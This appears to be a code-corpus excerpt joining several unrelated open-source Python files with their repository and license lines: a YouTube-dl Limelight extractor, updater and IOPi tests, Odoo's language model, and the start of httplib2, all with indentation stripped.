for file, html in doc.iteritems():
filename = string.replace(file,'.md','.html')
zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
zip_dir(zf,'assets',modulepath,['.pyc','.js'])
zip_dir(zf,'example',modulepath,['.pyc'])
zip_dir(zf,'platform',modulepath,['.pyc','.js'])
zf.write('LICENSE','%s/LICENSE' % modulepath)
zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
exports_file = 'metadata.json'
if os.path.exists(exports_file):
zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
zf.close()
if __name__ == '__main__':
manifest,mf = validate_manifest()
validate_license()
config = read_ti_xcconfig()
sdk = find_sdk(config)
sys.path.insert(0,os.path.join(sdk,'iphone'))
sys.path.append(os.path.join(sdk, "common"))
compile_js(manifest,config)
build_module(manifest,config)
package_module(manifest,mf,config)
sys.exit(0)
| mit |
codesparkle/youtube-dl | youtube_dl/extractor/limelight.py | 8 | 11581 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
)
class LimelightBaseIE(InfoExtractor):
_PLAYLIST_SERVICE_URL = 'http://production-ps.lvp.llnw.net/r/PlaylistService/%s/%s/%s'
_API_URL = 'http://api.video.limelight.com/rest/organizations/%s/%s/%s/%s.json'
def _call_playlist_service(self, item_id, method, fatal=True):
return self._download_json(
self._PLAYLIST_SERVICE_URL % (self._PLAYLIST_SERVICE_PATH, item_id, method),
item_id, 'Downloading PlaylistService %s JSON' % method, fatal=fatal)
def _call_api(self, organization_id, item_id, method):
return self._download_json(
self._API_URL % (organization_id, self._API_PATH, item_id, method),
item_id, 'Downloading API %s JSON' % method)
def _extract(self, item_id, pc_method, mobile_method, meta_method):
pc = self._call_playlist_service(item_id, pc_method)
metadata = self._call_api(pc['orgId'], item_id, meta_method)
mobile = self._call_playlist_service(item_id, mobile_method, fatal=False)
return pc, mobile, metadata
def _extract_info(self, streams, mobile_urls, properties):
video_id = properties['media_id']
formats = []
urls = []
for stream in streams:
stream_url = stream.get('url')
if not stream_url or stream.get('drmProtected') or stream_url in urls:
continue
urls.append(stream_url)
ext = determine_ext(stream_url)
if ext == 'f4m':
formats.extend(self._extract_f4m_formats(
stream_url, video_id, f4m_id='hds', fatal=False))
else:
fmt = {
'url': stream_url,
'abr': float_or_none(stream.get('audioBitRate')),
'vbr': float_or_none(stream.get('videoBitRate')),
'fps': float_or_none(stream.get('videoFrameRate')),
'width': int_or_none(stream.get('videoWidthInPixels')),
'height': int_or_none(stream.get('videoHeightInPixels')),
'ext': ext,
}
rtmp = re.search(r'^(?P<url>rtmpe?://(?P<host>[^/]+)/(?P<app>.+))/(?P<playpath>mp4:.+)$', stream_url)
if rtmp:
format_id = 'rtmp'
if stream.get('videoBitRate'):
format_id += '-%d' % int_or_none(stream['videoBitRate'])
http_url = 'http://cpl.delvenetworks.com/' + rtmp.group('playpath')[4:]
urls.append(http_url)
http_fmt = fmt.copy()
http_fmt.update({
'url': http_url,
'format_id': format_id.replace('rtmp', 'http'),
})
formats.append(http_fmt)
fmt.update({
'url': rtmp.group('url'),
'play_path': rtmp.group('playpath'),
'app': rtmp.group('app'),
'ext': 'flv',
'format_id': format_id,
})
formats.append(fmt)
for mobile_url in mobile_urls:
media_url = mobile_url.get('mobileUrl')
format_id = mobile_url.get('targetMediaPlatform')
if not media_url or format_id in ('Widevine', 'SmoothStreaming') or media_url in urls:
continue
urls.append(media_url)
ext = determine_ext(media_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', 'm3u8_native',
m3u8_id=format_id, fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
stream_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': media_url,
'format_id': format_id,
'preference': -1,
'ext': ext,
})
self._sort_formats(formats)
title = properties['title']
description = properties.get('description')
timestamp = int_or_none(properties.get('publish_date') or properties.get('create_date'))
duration = float_or_none(properties.get('duration_in_milliseconds'), 1000)
filesize = int_or_none(properties.get('total_storage_in_bytes'))
categories = [properties.get('category')]
tags = properties.get('tags', [])
thumbnails = [{
'url': thumbnail['url'],
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
} for thumbnail in properties.get('thumbnails', []) if thumbnail.get('url')]
subtitles = {}
for caption in properties.get('captions', []):
lang = caption.get('language_code')
subtitles_url = caption.get('url')
if lang and subtitles_url:
subtitles.setdefault(lang, []).append({
'url': subtitles_url,
})
closed_captions_url = properties.get('closed_captions_url')
if closed_captions_url:
subtitles.setdefault('en', []).append({
'url': closed_captions_url,
'ext': 'ttml',
})
return {
'id': video_id,
'title': title,
'description': description,
'formats': formats,
'timestamp': timestamp,
'duration': duration,
'filesize': filesize,
'categories': categories,
'tags': tags,
'thumbnails': thumbnails,
'subtitles': subtitles,
}
class LimelightMediaIE(LimelightBaseIE):
IE_NAME = 'limelight'
_VALID_URL = r'''(?x)
(?:
limelight:media:|
https?://
(?:
link\.videoplatform\.limelight\.com/media/|
assets\.delvenetworks\.com/player/loader\.swf
)
\?.*?\bmediaId=
)
(?P<id>[a-z0-9]{32})
'''
_TESTS = [{
'url': 'http://link.videoplatform.limelight.com/media/?mediaId=3ffd040b522b4485b6d84effc750cd86',
'info_dict': {
'id': '3ffd040b522b4485b6d84effc750cd86',
'ext': 'mp4',
'title': 'HaP and the HB Prince Trailer',
'description': 'md5:8005b944181778e313d95c1237ddb640',
'thumbnail': 're:^https?://.*\.jpeg$',
'duration': 144.23,
'timestamp': 1244136834,
'upload_date': '20090604',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
# video with subtitles
'url': 'limelight:media:a3e00274d4564ec4a9b29b9466432335',
'md5': '2fa3bad9ac321e23860ca23bc2c69e3d',
'info_dict': {
'id': 'a3e00274d4564ec4a9b29b9466432335',
'ext': 'mp4',
'title': '3Play Media Overview Video',
'thumbnail': 're:^https?://.*\.jpeg$',
'duration': 78.101,
'timestamp': 1338929955,
'upload_date': '20120605',
'subtitles': 'mincount:9',
},
}, {
'url': 'https://assets.delvenetworks.com/player/loader.swf?mediaId=8018a574f08d416e95ceaccae4ba0452',
'only_matching': True,
}]
_PLAYLIST_SERVICE_PATH = 'media'
_API_PATH = 'media'
def _real_extract(self, url):
video_id = self._match_id(url)
pc, mobile, metadata = self._extract(
video_id, 'getPlaylistByMediaId', 'getMobilePlaylistByMediaId', 'properties')
return self._extract_info(
pc['playlistItems'][0].get('streams', []),
mobile['mediaList'][0].get('mobileUrls', []) if mobile else [],
metadata)
class LimelightChannelIE(LimelightBaseIE):
IE_NAME = 'limelight:channel'
_VALID_URL = r'''(?x)
(?:
limelight:channel:|
https?://
(?:
link\.videoplatform\.limelight\.com/media/|
assets\.delvenetworks\.com/player/loader\.swf
)
\?.*?\bchannelId=
)
(?P<id>[a-z0-9]{32})
'''
_TESTS = [{
'url': 'http://link.videoplatform.limelight.com/media/?channelId=ab6a524c379342f9b23642917020c082',
'info_dict': {
'id': 'ab6a524c379342f9b23642917020c082',
'title': 'Javascript Sample Code',
},
'playlist_mincount': 3,
}, {
'url': 'http://assets.delvenetworks.com/player/loader.swf?channelId=ab6a524c379342f9b23642917020c082',
'only_matching': True,
}]
_PLAYLIST_SERVICE_PATH = 'channel'
_API_PATH = 'channels'
def _real_extract(self, url):
channel_id = self._match_id(url)
pc, mobile, medias = self._extract(
channel_id, 'getPlaylistByChannelId',
'getMobilePlaylistWithNItemsByChannelId?begin=0&count=-1', 'media')
entries = [
self._extract_info(
pc['playlistItems'][i].get('streams', []),
mobile['mediaList'][i].get('mobileUrls', []) if mobile else [],
medias['media_list'][i])
for i in range(len(medias['media_list']))]
return self.playlist_result(entries, channel_id, pc['title'])
class LimelightChannelListIE(LimelightBaseIE):
IE_NAME = 'limelight:channel_list'
_VALID_URL = r'''(?x)
(?:
limelight:channel_list:|
https?://
(?:
link\.videoplatform\.limelight\.com/media/|
assets\.delvenetworks\.com/player/loader\.swf
)
\?.*?\bchannelListId=
)
(?P<id>[a-z0-9]{32})
'''
_TESTS = [{
'url': 'http://link.videoplatform.limelight.com/media/?channelListId=301b117890c4465c8179ede21fd92e2b',
'info_dict': {
'id': '301b117890c4465c8179ede21fd92e2b',
'title': 'Website - Hero Player',
},
'playlist_mincount': 2,
}, {
'url': 'https://assets.delvenetworks.com/player/loader.swf?channelListId=301b117890c4465c8179ede21fd92e2b',
'only_matching': True,
}]
_PLAYLIST_SERVICE_PATH = 'channel_list'
def _real_extract(self, url):
channel_list_id = self._match_id(url)
channel_list = self._call_playlist_service(channel_list_id, 'getMobileChannelListById')
entries = [
self.url_result('limelight:channel:%s' % channel['id'], 'LimelightChannel')
for channel in channel_list['channelList']]
return self.playlist_result(entries, channel_list_id, channel_list['title'])
| unlicense |
bq/web2board | src/Test/unit/Updaters/testWeb2boardUpdater.py | 1 | 2834 | import os
import sys
import unittest
from flexmock import flexmock, flexmock_teardown
from Test.testingUtils import restore_test_resources, restore_paths
from libs.PathsManager import PathsManager as pm
from libs.Updaters.Web2boardUpdater import Web2BoardUpdater, UpdaterError
class TestWeb2boardUpdater(unittest.TestCase):
def setUp(self):
relative_data_path = os.path.join("Updater", "Web2boardUpdater")
self.test_data_path = os.path.join(pm.TEST_SETTINGS_PATH, relative_data_path)
self.main_path = os.path.join(self.test_data_path, "main")
self.updater = Web2BoardUpdater()
self.os_mock = flexmock(os, popen=lambda x: None)
self.exit_mock = flexmock(sys, exit=lambda x: None)
restore_test_resources(relative_data_path)
pm.get_dst_path_for_update = classmethod(lambda cls, v: self.main_path + os.sep + "_" + v)
pm.PROGRAM_PATH = os.path.join(self.test_data_path, 'programPath')
def tearDown(self):
flexmock_teardown()
restore_paths()
def test_update_updatesFilesInProgramPath(self):
self.assertFalse(os.path.isdir(pm.PROGRAM_PATH))
self.updater.update("0", pm.PROGRAM_PATH).result()
self.assertTrue(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'readme'))
def test_update_removesOriginalFiles(self):
pm.PROGRAM_PATH = os.path.join(self.test_data_path, 'otherProgramPath')
self.assertTrue(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'new'))
self.updater.update("0", pm.PROGRAM_PATH).result()
self.assertTrue(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'readme'))
self.assertFalse(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'new'))
def test_update_raiseExceptionIfNoConfirmFile(self):
with self.assertRaises(UpdaterError):
self.updater.update("1", pm.PROGRAM_PATH).result()
self.assertFalse(os.path.isdir(pm.PROGRAM_PATH))
def test_get_new_download_version__returnsVersionIfOnlyOneConfirm(self):
self.assertEqual(self.updater.get_new_downloaded_version(), "0")
def test_get_new_download_version__returnsNewerVersion(self):
versions = ["3.0.1", "3.0.0", "2.99.1"]
for v in versions:
with open(pm.get_dst_path_for_update(v) + ".confirm", "w"):
pass
self.assertEqual(self.updater.get_new_downloaded_version(), versions[0])
def test_get_new_download_version__returnsNoneIfNoConfirm(self):
os.remove(pm.get_dst_path_for_update("0") + ".confirm")
self.assertIsNone(self.updater.get_new_downloaded_version())
def test_clear_new_versions_removesAllVersionsFiles(self):
self.updater.clear_new_versions()
files = os.listdir(self.main_path)
self.assertEqual(len(files), 1)
self.assertEqual(files[0], "readme")
| lgpl-3.0 |
abelectronicsuk/ABElectronics_Python_Libraries | IOPi/tests/get_interrupt_on_pin.py | 1 | 2348 | #!/usr/bin/env python
"""
================================================
ABElectronics IO Pi Tests | test get_interrupt_on_pin function
Requires python smbus to be installed
For Python 2 install with: sudo apt-get install python-smbus
For Python 3 install with: sudo apt-get install python3-smbus
run with: python3 get_interrupt_on_pin.py
================================================
This test validates the get_interrupt_on_pin function in the IOPi class.
=== Expected Result ============================
> Console Output:
get_interrupt_on_pin() low boundary check: PASSED
get_interrupt_on_pin() high boundary check: PASSED
Test Passed
"""
from __future__ import absolute_import, division, print_function, \
unicode_literals
try:
import sys
sys.path.append("..")
from IOPi import IOPi
except ImportError:
raise ImportError("Failed to import IOPi library")
def main():
"""
Main program function
"""
passed = True
iopi = IOPi(0x20, False) # new iopi object without initialisation
# Check get_interrupt_on_pin for low out of bounds
try:
iopi.get_interrupt_on_pin(-1)
pass
except ValueError:
print("get_interrupt_on_pin() low boundary check: PASSED")
pass
except IOError:
passed = False
print("I2C IOError")
else:
passed = False
print("get_interrupt_on_pin() low boundary check: FAILED")
pass
# Check get_interrupt_on_pin for low out of bounds
try:
iopi.get_interrupt_on_pin(17)
pass
except ValueError:
print("get_interrupt_on_pin() high boundary check: PASSED")
pass
except IOError:
passed = False
print("I2C IOError")
else:
passed = False
print("get_interrupt_on_pin() high boundary check: FAILED")
pass
for a in range(1, 17):
iopi.set_interrupt_on_pin(a, 0)
x = iopi.get_interrupt_on_pin(a)
if x != 0:
passed = False
break
iopi.set_interrupt_on_pin(a, 1)
x = iopi.get_interrupt_on_pin(a)
if x != 1:
passed = False
break
if passed is False:
print("Test Failed")
else:
print("Test Passed")
if __name__ == "__main__":
main()
| gpl-2.0 |
aaltinisik/OCBAltinkaya | openerp/addons/base/res/res_lang.py | 1 | 12956 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import locale
from locale import localeconv
import logging
import re
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class lang(osv.osv):
_name = "res.lang"
_description = "Languages"
_disallowed_datetime_patterns = tools.DATETIME_FORMATS_MAP.keys()
_disallowed_datetime_patterns.remove('%y') # this one is in fact allowed, just not good practice
def install_lang(self, cr, uid, **args):
"""
This method is called from openerp/addons/base/base_data.xml to load
some language and set it as the default for every partners. The
language is set via tools.config by the RPC 'create' method on the
'db' object. This is a fragile solution and something else should be
found.
"""
lang = tools.config.get('lang')
if not lang:
return False
lang_ids = self.search(cr, uid, [('code','=', lang)])
if not lang_ids:
self.load_lang(cr, uid, lang)
ir_values_obj = self.pool.get('ir.values')
default_value = ir_values_obj.get(cr, uid, 'default', False, ['res.partner'])
if not default_value:
ir_values_obj.set(cr, uid, 'default', False, 'lang', ['res.partner'], lang)
return True
def load_lang(self, cr, uid, lang, lang_name=None):
""" Create the given language if necessary, and make it active. """
# if the language exists, simply make it active
lang_ids = self.search(cr, uid, [('code', '=', lang)], context={'active_test': False})
if lang_ids:
self.write(cr, uid, lang_ids, {'active': True})
return lang_ids[0]
# create the language with locale information
fail = True
iso_lang = tools.get_iso_codes(lang)
for ln in tools.get_locales(lang):
try:
locale.setlocale(locale.LC_ALL, str(ln))
fail = False
break
except locale.Error:
continue
if fail:
lc = locale.getdefaultlocale()[0]
msg = 'Unable to get information for locale %s. Information from the default locale (%s) have been used.'
_logger.warning(msg, lang, lc)
if not lang_name:
lang_name = tools.ALL_LANGUAGES.get(lang, lang)
def fix_xa0(s):
"""Fix badly-encoded non-breaking space Unicode character from locale.localeconv(),
coercing to utf-8, as some platform seem to output localeconv() in their system
encoding, e.g. Windows-1252"""
if s == '\xa0':
return '\xc2\xa0'
return s
def fix_datetime_format(format):
"""Python's strftime supports only the format directives
that are available on the platform's libc, so in order to
be 100% cross-platform we map to the directives required by
the C standard (1989 version), always available on platforms
with a C standard implementation."""
# For some locales, nl_langinfo returns a D_FMT/T_FMT that contains
# unsupported '%-' patterns, e.g. for cs_CZ
format = format.replace('%-', '%')
for pattern, replacement in tools.DATETIME_FORMATS_MAP.iteritems():
format = format.replace(pattern, replacement)
return str(format)
lang_info = {
'code': lang,
'iso_code': iso_lang,
'name': lang_name,
'translatable': 1,
'date_format' : fix_datetime_format(locale.nl_langinfo(locale.D_FMT)),
'time_format' : fix_datetime_format(locale.nl_langinfo(locale.T_FMT)),
'decimal_point' : fix_xa0(str(locale.localeconv()['decimal_point'])),
'thousands_sep' : fix_xa0(str(locale.localeconv()['thousands_sep'])),
}
lang_id = False
try:
lang_id = self.create(cr, uid, lang_info)
finally:
tools.resetlocale()
return lang_id
def _check_format(self, cr, uid, ids, context=None):
for lang in self.browse(cr, uid, ids, context=context):
for pattern in self._disallowed_datetime_patterns:
if (lang.time_format and pattern in lang.time_format)\
or (lang.date_format and pattern in lang.date_format):
return False
return True
def _check_grouping(self, cr, uid, ids, context=None):
for lang in self.browse(cr, uid, ids, context=context):
try:
if not all(isinstance(x, int) for x in eval(lang.grouping)):
return False
except Exception:
return False
return True
def _get_default_date_format(self, cursor, user, context=None):
return '%m/%d/%Y'
def _get_default_time_format(self, cursor, user, context=None):
return '%H:%M:%S'
_columns = {
'name': fields.char('Name', required=True),
'code': fields.char('Locale Code', size=16, required=True, help='This field is used to set/get locales for user'),
'iso_code': fields.char('ISO code', size=16, required=False, help='This ISO code is the name of po files to use for translations'),
'translatable': fields.boolean('Translatable'),
'active': fields.boolean('Active'),
'direction': fields.selection([('ltr', 'Left-to-Right'), ('rtl', 'Right-to-Left')], 'Direction', required=True),
'date_format':fields.char('Date Format', required=True),
'time_format':fields.char('Time Format', required=True),
'grouping':fields.char('Separator Format', required=True,help="The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case."),
'decimal_point':fields.char('Decimal Separator', required=True),
'thousands_sep':fields.char('Thousands Separator'),
}
_defaults = {
'active': 1,
'translatable': 0,
'direction': 'ltr',
'date_format':_get_default_date_format,
'time_format':_get_default_time_format,
'grouping': '[3, 0]',
'decimal_point': '.',
'thousands_sep': ',',
}
_sql_constraints = [
('name_uniq', 'unique (name)', 'The name of the language must be unique !'),
('code_uniq', 'unique (code)', 'The code of the language must be unique !'),
]
_constraints = [
(_check_format, 'Invalid date/time format directive specified. Please refer to the list of allowed directives, displayed when you edit a language.', ['time_format', 'date_format']),
(_check_grouping, "The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case.", ['grouping'])
]
@tools.ormcache(skiparg=3)
def _lang_data_get(self, cr, uid, lang, monetary=False):
if type(lang) in (str, unicode):
lang = self.search(cr, uid, [('code', '=', lang)]) or \
self.search(cr, uid, [('code', '=', 'en_US')])
lang = lang[0]
conv = localeconv()
lang_obj = self.browse(cr, uid, lang)
thousands_sep = lang_obj.thousands_sep or conv[monetary and 'mon_thousands_sep' or 'thousands_sep']
decimal_point = lang_obj.decimal_point
grouping = lang_obj.grouping
return grouping, thousands_sep, decimal_point
def write(self, cr, uid, ids, vals, context=None):
if 'code' in vals:
for rec in self.browse(cr, uid, ids, context):
if rec.code != vals['code']:
raise osv.except_osv(_('User Error'), _("Language code cannot be modified."))
for lang_id in ids :
self._lang_data_get.clear_cache(self)
return super(lang, self).write(cr, uid, ids, vals, context)
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
languages = self.read(cr, uid, ids, ['code','active'], context=context)
for language in languages:
ctx_lang = context.get('lang')
if language['code']=='en_US':
raise osv.except_osv(_('User Error'), _("Base Language 'en_US' can not be deleted!"))
if ctx_lang and (language['code']==ctx_lang):
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is User's Preferred Language!"))
if language['active']:
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is Active!\nPlease de-activate the language first."))
trans_obj = self.pool.get('ir.translation')
trans_ids = trans_obj.search(cr, uid, [('lang','=',language['code'])], context=context)
trans_obj.unlink(cr, uid, trans_ids, context=context)
return super(lang, self).unlink(cr, uid, ids, context=context)
#
# IDS: can be a list of IDS or a list of XML_IDS
#
def format(self, cr, uid, ids, percent, value, grouping=False, monetary=False, context=None):
""" Format() will return the language-specific output for float values"""
if percent[0] != '%':
raise ValueError("format() must be given exactly one %char format specifier")
formatted = percent % value
# floats and decimal ints need special action!
if grouping:
lang_grouping, thousands_sep, decimal_point = \
self._lang_data_get(cr, uid, ids[0], monetary)
eval_lang_grouping = eval(lang_grouping)
if percent[-1] in 'eEfFgG':
parts = formatted.split('.')
parts[0], _ = intersperse(parts[0], eval_lang_grouping, thousands_sep)
formatted = decimal_point.join(parts)
elif percent[-1] in 'diu':
formatted = intersperse(formatted, eval_lang_grouping, thousands_sep)[0]
return formatted
# import re, operator
# _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?'
# r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]')
lang()
def split(l, counts):
"""
>>> split("hello world", [])
['hello world']
>>> split("hello world", [1])
['h', 'ello world']
>>> split("hello world", [2])
['he', 'llo world']
>>> split("hello world", [2,3])
['he', 'llo', ' world']
>>> split("hello world", [2,3,0])
['he', 'llo', ' wo', 'rld']
>>> split("hello world", [2,-1,3])
['he', 'llo world']
"""
res = []
saved_count = len(l) # count to use when encoutering a zero
for count in counts:
if not l:
break
if count == -1:
break
if count == 0:
while l:
res.append(l[:saved_count])
l = l[saved_count:]
break
res.append(l[:count])
l = l[count:]
saved_count = count
if l:
res.append(l)
return res
intersperse_pat = re.compile('([^0-9]*)([^ ]*)(.*)')
def intersperse(string, counts, separator=''):
"""
See the asserts below for examples.
"""
left, rest, right = intersperse_pat.match(string).groups()
def reverse(s): return s[::-1]
splits = split(reverse(rest), counts)
res = separator.join(map(reverse, reverse(splits)))
return left + res + right, len(splits) > 0 and len(splits) -1 or 0
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Elettronik/SickRage | lib/httplib2/__init__.py | 106 | 71120 | from __future__ import generators
"""
httplib2
A caching http interface that supports ETags and gzip
to conserve bandwidth.
Requires Python 2.3 or later
Changelog:
2007-08-18, Rick: Modified so it's able to use a socks proxy if needed.
"""
__author__ = "Joe Gregorio (joe@bitworking.org)"
__copyright__ = "Copyright 2006, Joe Gregorio"
__contributors__ = ["Thomas Broyer (t.broyer@ltgt.net)",
"James Antill",
"Xavier Verges Farrero",
"Jonathan Feinberg",
"Blair Zajac",
"Sam Ruby",
"Louis Nyffenegger"]
__license__ = "MIT"
__version__ = "0.9.2"
import re
import sys
import email
import email.Utils
import email.Message
import email.FeedParser
import StringIO
import gzip
import zlib
import httplib
import urlparse
import urllib
import base64
import os
import copy
import calendar
import time
import random
import errno
try:
from hashlib import sha1 as _sha, md5 as _md5
except ImportError:
# prior to Python 2.5, these were separate modules
import sha
import md5
_sha = sha.new
_md5 = md5.new
import hmac
from gettext import gettext as _
import socket
try:
from httplib2 import socks
except ImportError:
try:
import socks
except (ImportError, AttributeError):
socks = None
# Build the appropriate socket wrapper for ssl
try:
import ssl # python 2.6
ssl_SSLError = ssl.SSLError
def _ssl_wrap_socket(sock, key_file, cert_file,
disable_validation, ca_certs):
if disable_validation:
cert_reqs = ssl.CERT_NONE
else:
cert_reqs = ssl.CERT_REQUIRED
# We should be specifying SSL version 3 or TLS v1, but the ssl module
# doesn't expose the necessary knobs. So we need to go with the default
# of SSLv23.
return ssl.wrap_socket(sock, keyfile=key_file, certfile=cert_file,
cert_reqs=cert_reqs, ca_certs=ca_certs)
except (AttributeError, ImportError):
ssl_SSLError = None
def _ssl_wrap_socket(sock, key_file, cert_file,
disable_validation, ca_certs):
if not disable_validation:
raise CertificateValidationUnsupported(
"SSL certificate validation is not supported without "
"the ssl module installed. To avoid this error, install "
"the ssl module, or explicity disable validation.")
ssl_sock = socket.ssl(sock, key_file, cert_file)
return httplib.FakeSocket(sock, ssl_sock)
if sys.version_info >= (2,3):
from iri2uri import iri2uri
else:
def iri2uri(uri):
return uri
def has_timeout(timeout): # python 2.6
if hasattr(socket, '_GLOBAL_DEFAULT_TIMEOUT'):
return (timeout is not None and timeout is not socket._GLOBAL_DEFAULT_TIMEOUT)
return (timeout is not None)
__all__ = [
'Http', 'Response', 'ProxyInfo', 'HttpLib2Error', 'RedirectMissingLocation',
'RedirectLimit', 'FailedToDecompressContent',
'UnimplementedDigestAuthOptionError',
'UnimplementedHmacDigestAuthOptionError',
'debuglevel', 'ProxiesUnavailableError']
# The httplib debug level, set to a non-zero value to get debug output
debuglevel = 0
# A request will be tried 'RETRIES' times if it fails at the socket/connection level.
RETRIES = 2
# Python 2.3 support
if sys.version_info < (2,4):
def sorted(seq):
seq.sort()
return seq
# Python 2.3 support
def HTTPResponse__getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise httplib.ResponseNotReady()
return self.msg.items()
if not hasattr(httplib.HTTPResponse, 'getheaders'):
httplib.HTTPResponse.getheaders = HTTPResponse__getheaders
# All exceptions raised here derive from HttpLib2Error
class HttpLib2Error(Exception): pass
# Some exceptions can be caught and optionally
# be turned back into responses.
class HttpLib2ErrorWithResponse(HttpLib2Error):
def __init__(self, desc, response, content):
self.response = response
self.content = content
HttpLib2Error.__init__(self, desc)
class RedirectMissingLocation(HttpLib2ErrorWithResponse): pass
class RedirectLimit(HttpLib2ErrorWithResponse): pass
class FailedToDecompressContent(HttpLib2ErrorWithResponse): pass
class UnimplementedDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class UnimplementedHmacDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class MalformedHeader(HttpLib2Error): pass
class RelativeURIError(HttpLib2Error): pass
class ServerNotFoundError(HttpLib2Error): pass
class ProxiesUnavailableError(HttpLib2Error): pass
class CertificateValidationUnsupported(HttpLib2Error): pass
class SSLHandshakeError(HttpLib2Error): pass
class NotSupportedOnThisPlatform(HttpLib2Error): pass
class CertificateHostnameMismatch(SSLHandshakeError):
def __init__(self, desc, host, cert):
HttpLib2Error.__init__(self, desc)
self.host = host
self.cert = cert
# Open Items:
# -----------
# Proxy support
# Are we removing the cached content too soon on PUT (only delete on 200 Maybe?)
# Pluggable cache storage (supports storing the cache in
# flat files by default. We need a plug-in architecture
# that can support Berkeley DB and Squid)
# == Known Issues ==
# Does not handle a resource that uses conneg and Last-Modified but no ETag as a cache validator.
# Does not handle Cache-Control: max-stale
# Does not use Age: headers when calculating cache freshness.
# The number of redirections to follow before giving up.
# Note that only GET redirects are automatically followed.
# Will also honor 301 requests by saving that info and never
# requesting that URI again.
DEFAULT_MAX_REDIRECTS = 5
try:
# Users can optionally provide a module that tells us where the CA_CERTS
# are located.
import ca_certs_locater
CA_CERTS = ca_certs_locater.get()
except ImportError:
# Default CA certificates file bundled with httplib2.
CA_CERTS = os.path.join(
os.path.dirname(os.path.abspath(__file__ )), "cacerts.txt")
# Which headers are hop-by-hop headers by default
HOP_BY_HOP = ['connection', 'keep-alive', 'proxy-authenticate', 'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade']
def _get_end2end_headers(response):
hopbyhop = list(HOP_BY_HOP)
hopbyhop.extend([x.strip() for x in response.get('connection', '').split(',')])
return [header for header in response.keys() if header not in hopbyhop]
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")
def parse_uri(uri):
"""Parses a URI using the regex given in Appendix B of RFC 3986.
(scheme, authority, path, query, fragment) = parse_uri(uri)
"""
groups = URI.match(uri).groups()
return (groups[1], groups[3], groups[4], groups[6], groups[8])
def urlnorm(uri):
(scheme, authority, path, query, fragment) = parse_uri(uri)
if not scheme or not authority:
raise RelativeURIError("Only absolute URIs are allowed. uri = %s" % uri)
authority = authority.lower()
scheme = scheme.lower()
if not path:
path = "/"
# Could do syntax based normalization of the URI before
# computing the digest. See Section 6.2.2 of Std 66.
request_uri = query and "?".join([path, query]) or path
scheme = scheme.lower()
defrag_uri = scheme + "://" + authority + request_uri
return scheme, authority, request_uri, defrag_uri
# Cache filename construction (original borrowed from Venus http://intertwingly.net/code/venus/)
re_url_scheme = re.compile(r'^\w+://')
re_slash = re.compile(r'[?/:|]+')
def safename(filename):
"""Return a filename suitable for the cache.
Strips dangerous and common characters to create a filename we
can use to store the cache in.
"""
try:
if re_url_scheme.match(filename):
if isinstance(filename,str):
filename = filename.decode('utf-8')
filename = filename.encode('idna')
else:
filename = filename.encode('idna')
except UnicodeError:
pass
if isinstance(filename,unicode):
filename=filename.encode('utf-8')
filemd5 = _md5(filename).hexdigest()
filename = re_url_scheme.sub("", filename)
filename = re_slash.sub(",", filename)
# limit length of filename
if len(filename)>200:
filename=filename[:200]
return ",".join((filename, filemd5))
NORMALIZE_SPACE = re.compile(r'(?:\r\n)?[ \t]+')
def _normalize_headers(headers):
return dict([ (key.lower(), NORMALIZE_SPACE.sub(value, ' ').strip()) for (key, value) in headers.iteritems()])
def _parse_cache_control(headers):
retval = {}
if headers.has_key('cache-control'):
parts = headers['cache-control'].split(',')
parts_with_args = [tuple([x.strip().lower() for x in part.split("=", 1)]) for part in parts if -1 != part.find("=")]
parts_wo_args = [(name.strip().lower(), 1) for name in parts if -1 == name.find("=")]
retval = dict(parts_with_args + parts_wo_args)
return retval
# Whether to use a strict mode to parse WWW-Authenticate headers
# Might lead to bad results in case of ill-formed header value,
# so disabled by default, falling back to relaxed parsing.
# Set to true to turn on, usefull for testing servers.
USE_WWW_AUTH_STRICT_PARSING = 0
# In regex below:
